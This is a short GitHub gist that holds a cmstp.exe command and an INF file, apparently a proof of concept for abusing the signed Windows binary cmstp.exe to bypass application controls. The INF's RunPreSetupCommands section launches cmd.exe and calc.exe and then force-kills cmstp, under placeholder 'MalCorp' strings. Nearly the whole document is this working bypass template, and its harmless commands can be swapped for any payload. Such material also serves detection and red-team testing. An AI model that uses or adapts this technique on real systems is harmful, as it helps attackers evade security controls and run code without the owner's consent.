Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save derekxmartin/f6c564a5c15551052a8eec5bc68aea12 to your computer and use it in GitHub Desktop.

Select an option

Save derekxmartin/f6c564a5c15551052a8eec5bc68aea12 to your computer and use it in GitHub Desktop.
cmstp.exe
cmstp.exe /s "C:\Users\derek\Desktop\bypass.inf" /au
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection
;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
;AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
c:\windows\system32\cmd.exe
calc.exe
taskkill /IM cmstp.exe /F
[Strings]
ServiceName="MalCorp"
ShortSvcName="malcorp"
DesktopGUID="{BC63D377-66BA-4935-BAD4-DD402D23A85A}"
UninstallAppTitle="MalCorp"
DesktopIcon=""
PhonebookPath=""
BeginPrompt="Do you want to remove MalCorp?"
EndPrompt="Successfully removed MalCorp."
DisplayLCID=1033
CmLCID=1033
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment